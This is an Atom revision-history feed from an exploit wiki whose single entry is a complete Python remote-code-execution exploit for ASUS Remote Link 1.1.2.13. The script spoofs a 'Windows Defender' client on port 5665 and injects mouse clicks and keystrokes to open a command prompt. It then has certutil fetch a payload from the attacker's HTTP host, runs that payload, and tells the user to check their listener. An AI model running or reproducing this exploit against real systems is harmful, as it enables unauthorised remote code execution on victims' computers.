<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=ASUS_Remote_Link_1.1.2.13_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>ASUS Remote Link 1.1.2.13 遠程代碼執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=ASUS_Remote_Link_1.1.2.13_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=ASUS_Remote_Link_1.1.2.13_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-04T20:05:23Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=ASUS_Remote_Link_1.1.2.13_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=1493&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit: ASUS Remote Link 1.1.2.13 - Remote Code Execution # Date: 24-02-2021 # Exploit Author: H4rk3nz0 # Vendor Homepage: http://asus.com/ # Software Link: h...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=ASUS_Remote_Link_1.1.2.13_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=1493&amp;oldid=prev"/>
		<updated>2021-04-11T01:01:32Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit: ASUS Remote Link 1.1.2.13 - Remote Code Execution # Date: 24-02-2021 # Exploit Author: H4rk3nz0 # Vendor Homepage: http://asus.com/ # Software Link: h...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit: ASUS Remote Link 1.1.2.13 - Remote Code Execution&lt;br /&gt;
# Date: 24-02-2021&lt;br /&gt;
# Exploit Author: H4rk3nz0&lt;br /&gt;
# Vendor Homepage: http://asus.com/&lt;br /&gt;
# Software Link: http://remotelink.asus.com/&lt;br /&gt;
# Version: 1.1.2.13&lt;br /&gt;
# Tested on: Windows 10 Enterprise Build 17763&lt;br /&gt;
# CVE: N/A&lt;br /&gt;
&lt;br /&gt;
#!/usr/bin/python&lt;br /&gt;
&lt;br /&gt;
import socket&lt;br /&gt;
from time import sleep&lt;br /&gt;
import sys&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
port = 5665&lt;br /&gt;
target = socket.socket(socket.AF_INET, socket.SOCK_STREAM)&lt;br /&gt;
&lt;br /&gt;
prefix = &amp;quot;04020b02&amp;quot;&lt;br /&gt;
suffix = &amp;quot;0000020000000000000000000300000000000000000004000000000000000000010000&amp;quot;&lt;br /&gt;
enter = (prefix + (&amp;quot;0&amp;quot; * 1038)).decode(&amp;quot;hex&amp;quot;)&lt;br /&gt;
string_prefix = &amp;quot;04020b0200000000010000&amp;quot;&lt;br /&gt;
string_suffix = &amp;quot;0&amp;quot; * 1022&lt;br /&gt;
pre_command = &amp;quot;04000b0200000000&amp;quot;.decode(&amp;quot;hex&amp;quot;)&lt;br /&gt;
user_declare = (&amp;quot;02028a0000000000000057696e646f777320446566656e646572&amp;quot; + &amp;quot;0&amp;quot; * 224).decode(&amp;quot;hex&amp;quot;) # Declares Connection Source as 'Windows Defender'&lt;br /&gt;
&lt;br /&gt;
# ASCII to Hex Character List&lt;br /&gt;
characters={&lt;br /&gt;
	&amp;quot;A&amp;quot;:&amp;quot;41&amp;quot;,&amp;quot;B&amp;quot;:&amp;quot;42&amp;quot;,&amp;quot;C&amp;quot;:&amp;quot;43&amp;quot;,&amp;quot;D&amp;quot;:&amp;quot;44&amp;quot;,&amp;quot;E&amp;quot;:&amp;quot;45&amp;quot;,&amp;quot;F&amp;quot;:&amp;quot;46&amp;quot;,&amp;quot;G&amp;quot;:&amp;quot;47&amp;quot;,&amp;quot;H&amp;quot;:&amp;quot;48&amp;quot;,&amp;quot;I&amp;quot;:&amp;quot;49&amp;quot;,&amp;quot;J&amp;quot;:&amp;quot;4a&amp;quot;,&amp;quot;K&amp;quot;:&amp;quot;4b&amp;quot;,&amp;quot;L&amp;quot;:&amp;quot;4c&amp;quot;,&amp;quot;M&amp;quot;:&amp;quot;4d&amp;quot;,&amp;quot;N&amp;quot;:&amp;quot;4e&amp;quot;,&lt;br /&gt;
	&amp;quot;O&amp;quot;:&amp;quot;4f&amp;quot;,&amp;quot;P&amp;quot;:&amp;quot;50&amp;quot;,&amp;quot;Q&amp;quot;:&amp;quot;51&amp;quot;,&amp;quot;R&amp;quot;:&amp;quot;52&amp;quot;,&amp;quot;S&amp;quot;:&amp;quot;53&amp;quot;,&amp;quot;T&amp;quot;:&amp;quot;54&amp;quot;,&amp;quot;U&amp;quot;:&amp;quot;55&amp;quot;,&amp;quot;V&amp;quot;:&amp;quot;56&amp;quot;,&amp;quot;W&amp;quot;:&amp;quot;57&amp;quot;,&amp;quot;X&amp;quot;:&amp;quot;58&amp;quot;,&amp;quot;Y&amp;quot;:&amp;quot;59&amp;quot;,&amp;quot;Z&amp;quot;:&amp;quot;5a&amp;quot;,&lt;br /&gt;
	&amp;quot;a&amp;quot;:&amp;quot;61&amp;quot;,&amp;quot;b&amp;quot;:&amp;quot;62&amp;quot;,&amp;quot;c&amp;quot;:&amp;quot;63&amp;quot;,&amp;quot;d&amp;quot;:&amp;quot;64&amp;quot;,&amp;quot;e&amp;quot;:&amp;quot;65&amp;quot;,&amp;quot;f&amp;quot;:&amp;quot;66&amp;quot;,&amp;quot;g&amp;quot;:&amp;quot;67&amp;quot;,&amp;quot;h&amp;quot;:&amp;quot;68&amp;quot;,&amp;quot;i&amp;quot;:&amp;quot;69&amp;quot;,&amp;quot;j&amp;quot;:&amp;quot;6a&amp;quot;,&amp;quot;k&amp;quot;:&amp;quot;6b&amp;quot;,&amp;quot;l&amp;quot;:&amp;quot;6c&amp;quot;,&amp;quot;m&amp;quot;:&amp;quot;6d&amp;quot;,&amp;quot;n&amp;quot;:&amp;quot;6e&amp;quot;,&lt;br /&gt;
	&amp;quot;o&amp;quot;:&amp;quot;6f&amp;quot;,&amp;quot;p&amp;quot;:&amp;quot;70&amp;quot;,&amp;quot;q&amp;quot;:&amp;quot;71&amp;quot;,&amp;quot;r&amp;quot;:&amp;quot;72&amp;quot;,&amp;quot;s&amp;quot;:&amp;quot;73&amp;quot;,&amp;quot;t&amp;quot;:&amp;quot;74&amp;quot;,&amp;quot;u&amp;quot;:&amp;quot;75&amp;quot;,&amp;quot;v&amp;quot;:&amp;quot;76&amp;quot;,&amp;quot;w&amp;quot;:&amp;quot;77&amp;quot;,&amp;quot;x&amp;quot;:&amp;quot;78&amp;quot;,&amp;quot;y&amp;quot;:&amp;quot;79&amp;quot;,&amp;quot;z&amp;quot;:&amp;quot;7a&amp;quot;,&lt;br /&gt;
	&amp;quot;1&amp;quot;:&amp;quot;31&amp;quot;,&amp;quot;2&amp;quot;:&amp;quot;32&amp;quot;,&amp;quot;3&amp;quot;:&amp;quot;33&amp;quot;,&amp;quot;4&amp;quot;:&amp;quot;34&amp;quot;,&amp;quot;5&amp;quot;:&amp;quot;35&amp;quot;,&amp;quot;6&amp;quot;:&amp;quot;36&amp;quot;,&amp;quot;7&amp;quot;:&amp;quot;37&amp;quot;,&amp;quot;8&amp;quot;:&amp;quot;38&amp;quot;,&amp;quot;9&amp;quot;:&amp;quot;39&amp;quot;,&amp;quot;0&amp;quot;:&amp;quot;30&amp;quot;,&lt;br /&gt;
	&amp;quot; &amp;quot;:&amp;quot;20&amp;quot;,&amp;quot;+&amp;quot;:&amp;quot;2b&amp;quot;,&amp;quot;=&amp;quot;:&amp;quot;3d&amp;quot;,&amp;quot;/&amp;quot;:&amp;quot;2f&amp;quot;,&amp;quot;_&amp;quot;:&amp;quot;5f&amp;quot;,&amp;quot;&amp;lt;&amp;quot;:&amp;quot;3c&amp;quot;,&lt;br /&gt;
	&amp;quot;&amp;gt;&amp;quot;:&amp;quot;3e&amp;quot;,&amp;quot;[&amp;quot;:&amp;quot;5b&amp;quot;,&amp;quot;]&amp;quot;:&amp;quot;5d&amp;quot;,&amp;quot;!&amp;quot;:&amp;quot;21&amp;quot;,&amp;quot;@&amp;quot;:&amp;quot;40&amp;quot;,&amp;quot;#&amp;quot;:&amp;quot;23&amp;quot;,&amp;quot;$&amp;quot;:&amp;quot;24&amp;quot;,&amp;quot;%&amp;quot;:&amp;quot;25&amp;quot;,&amp;quot;^&amp;quot;:&amp;quot;5e&amp;quot;,&amp;quot;&amp;amp;&amp;quot;:&amp;quot;26&amp;quot;,&amp;quot;*&amp;quot;:&amp;quot;2a&amp;quot;,&lt;br /&gt;
	&amp;quot;(&amp;quot;:&amp;quot;28&amp;quot;,&amp;quot;)&amp;quot;:&amp;quot;29&amp;quot;,&amp;quot;-&amp;quot;:&amp;quot;2d&amp;quot;,&amp;quot;'&amp;quot;:&amp;quot;27&amp;quot;,'&amp;quot;':&amp;quot;22&amp;quot;,&amp;quot;:&amp;quot;:&amp;quot;3a&amp;quot;,&amp;quot;;&amp;quot;:&amp;quot;3b&amp;quot;,&amp;quot;?&amp;quot;:&amp;quot;3f&amp;quot;,&amp;quot;`&amp;quot;:&amp;quot;60&amp;quot;,&amp;quot;~&amp;quot;:&amp;quot;7e&amp;quot;,&lt;br /&gt;
	&amp;quot;\\&amp;quot;:&amp;quot;5c&amp;quot;,&amp;quot;|&amp;quot;:&amp;quot;7c&amp;quot;,&amp;quot;{&amp;quot;:&amp;quot;7b&amp;quot;,&amp;quot;}&amp;quot;:&amp;quot;7d&amp;quot;,&amp;quot;,&amp;quot;:&amp;quot;2c&amp;quot;,&amp;quot;.&amp;quot;:&amp;quot;2e&amp;quot;}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
# User Specified arguments&lt;br /&gt;
try:&lt;br /&gt;
	rhost = &amp;quot;192.168.1.93&amp;quot;&lt;br /&gt;
	lhost = sys.argv[2]&lt;br /&gt;
	payload = sys.argv[3]&lt;br /&gt;
except:&lt;br /&gt;
	print(&amp;quot;Usage: python &amp;quot; + sys.argv[0] + &amp;quot; &amp;lt;target-ip&amp;gt; &amp;lt;local-http-ip&amp;gt; &amp;lt;payload-name&amp;gt;&amp;quot;)&lt;br /&gt;
	exit()&lt;br /&gt;
&lt;br /&gt;
# HandShake Packets to Smart Gesture Server&lt;br /&gt;
def Handshake():&lt;br /&gt;
	target.connect((rhost,port))&lt;br /&gt;
	target.sendto(&amp;quot;b2&amp;quot;.decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
	target.sendto(&amp;quot;38323538&amp;quot;.decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
	target.sendto(&amp;quot;03000f0000000000&amp;quot;.decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
	target.sendto(&amp;quot;03020f000000000003310000000000&amp;quot;.decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
	target.sendto(&amp;quot;02008a0000000000&amp;quot;.decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
	target.sendto(user_declare,(rhost,port))&lt;br /&gt;
	sleep(0.1)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
def MoveMouse():&lt;br /&gt;
	for i in range(0,16):&lt;br /&gt;
		target.sendto(&amp;quot;0000330038040006&amp;quot;.decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
		target.sendto((&amp;quot;00013300380400060101db010000c502&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
		target.sendto((&amp;quot;00013300380400060101d0010000ca02&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
		target.sendto((&amp;quot;00013300380400060101c7010000ce02&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
		target.sendto((&amp;quot;00013300380400060101bd010000d202&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
		target.sendto((&amp;quot;00013300380400060101b2010000d502&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
		target.sendto((&amp;quot;00013300380400060101a6010000d802&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
		target.sendto((&amp;quot;0001330038040006010199010000db02&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
		target.sendto((&amp;quot;000133003804000601018d010000de02&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
		target.sendto((&amp;quot;0001330038040006010180010000e002&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
		target.sendto((&amp;quot;0001330038040006010171010000e402&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
		target.sendto((&amp;quot;0001330038040006010163010000e602&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
		target.sendto((&amp;quot;0001330038040006010154010000e902&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
		target.sendto((&amp;quot;0001330038040006010146010000eb02&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
		target.sendto((&amp;quot;000133003804000601013b010000ed02&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
		target.sendto((&amp;quot;000133003804000601012d010000f002&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
		target.sendto((&amp;quot;0001330038040006010120010000f302&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
		target.sendto((&amp;quot;0001330038040006010113010000f702&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
		target.sendto((&amp;quot;0001330038040006010107010000fa02&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
		target.sendto((&amp;quot;00013300380400060101fa000000fd02&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
		target.sendto((&amp;quot;00013300380400060101f10000000003&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
		target.sendto((&amp;quot;00013300380400060101e50000000303&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
		target.sendto((&amp;quot;00013300380400060101d90000000603&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
		target.sendto((&amp;quot;00013300380400060101ce0000000903&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
		target.sendto((&amp;quot;00013300380400060101c20000000d03&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
		target.sendto((&amp;quot;00013300380400060101b60000001103&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
		target.sendto((&amp;quot;00013300380400060101ab0000001403&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
		target.sendto((&amp;quot;00013300380400060101a00000001803&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
		target.sendto((&amp;quot;00013300380400060101950000001c03&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
		target.sendto((&amp;quot;00013300380400060101890000002003&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
		target.sendto((&amp;quot;000133003804000601017e0000002403&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
		target.sendto((&amp;quot;00013300380400060101740000002703&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
		target.sendto((&amp;quot;000133003804000601016c0000002a03&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
		target.sendto((&amp;quot;00013300380400060101650000002c03&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
		target.sendto((&amp;quot;000133003804000601015c0000002f03&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
		target.sendto((&amp;quot;000133003804000601015c0000003003&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
		target.sendto((&amp;quot;000233003804000601005c0000003003&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
		sleep(0.6)&lt;br /&gt;
&lt;br /&gt;
# Sends Left Click Input (Occasional Delay for some Reason)&lt;br /&gt;
def LeftClick():&lt;br /&gt;
	target.sendto(&amp;quot;0000330038040006&amp;quot;.decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
	target.sendto((&amp;quot;0001330038040006010116020000e502&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
	target.sendto((&amp;quot;0001330038040006010116020000e502&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
	target.sendto((&amp;quot;0001330038040006010116020000e502&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
	target.sendto((&amp;quot;0001330038040006010116020000e502&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
	target.sendto((&amp;quot;0001330038040006010116020000e502&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
	target.sendto((&amp;quot;0001330038040006010116020000e502&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
	target.sendto((&amp;quot;0001330038040006010116020000e502&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
	target.sendto((&amp;quot;0001330038040006010116020000e502&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
	target.sendto((&amp;quot;0002330038040006010016020000e502&amp;quot; + suffix).decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
	sleep(4)&lt;br /&gt;
&lt;br /&gt;
# Send Enter/Return Key Input&lt;br /&gt;
def SendReturn():&lt;br /&gt;
	target.sendto(pre_command,(rhost,port))&lt;br /&gt;
	sleep(0.2)&lt;br /&gt;
	target.sendto(enter,(rhost,port)) # Enter/Return Key&lt;br /&gt;
&lt;br /&gt;
# Send String Characters&lt;br /&gt;
def SendString(string):&lt;br /&gt;
	for char in string:&lt;br /&gt;
		convert = characters[char]&lt;br /&gt;
		final_string = string_prefix + convert + string_suffix&lt;br /&gt;
		target.sendto(pre_command,(rhost,port))&lt;br /&gt;
		target.sendto(final_string.decode(&amp;quot;hex&amp;quot;),(rhost,port))&lt;br /&gt;
		sleep(0.2)&lt;br /&gt;
&lt;br /&gt;
# Main Execution&lt;br /&gt;
def main():&lt;br /&gt;
	print(&amp;quot;[+] Saying Hello&amp;quot;)&lt;br /&gt;
	Handshake()&lt;br /&gt;
	sleep(2)&lt;br /&gt;
	print(&amp;quot;[+] Moving Mouse&amp;quot;)&lt;br /&gt;
	MoveMouse()&lt;br /&gt;
	print(&amp;quot;[+] Left Clicking (takes a few seconds)&amp;quot;)&lt;br /&gt;
	LeftClick() # Left Click is delayed sometimes&lt;br /&gt;
	print(&amp;quot;[+] Opening CMD&amp;quot;)&lt;br /&gt;
	SendString(&amp;quot;cmd.exe&amp;quot;) # Start Command Prompt&lt;br /&gt;
	sleep(0.5)&lt;br /&gt;
	SendReturn()&lt;br /&gt;
	sleep(1)&lt;br /&gt;
	print(&amp;quot;[+] Retrieving Payload&amp;quot;)&lt;br /&gt;
	SendString(&amp;quot;certutil.exe -f -urlcache http://&amp;quot; + lhost + &amp;quot;/&amp;quot; + payload + &amp;quot; C:\\Windows\Temp\\&amp;quot; + payload) # Retrieve Payload&lt;br /&gt;
	sleep(0.5)&lt;br /&gt;
	SendReturn()&lt;br /&gt;
	sleep(3)&lt;br /&gt;
	print(&amp;quot;[+] Executing&amp;quot;)&lt;br /&gt;
	SendString(&amp;quot;C:\\Windows\\Temp\\&amp;quot; + payload) # Execute Payload&lt;br /&gt;
	sleep(0.5)&lt;br /&gt;
	SendReturn()&lt;br /&gt;
	sleep(0.5)&lt;br /&gt;
	print(&amp;quot;[+] Done! Check your listener?&amp;quot;)&lt;br /&gt;
	SendReturn() # Trailing Enter Command Ensures full execution&lt;br /&gt;
	target.close()&lt;br /&gt;
	exit()&lt;br /&gt;
&lt;br /&gt;
if __name__==&amp;quot;__main__&amp;quot;:&lt;br /&gt;
	main()&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>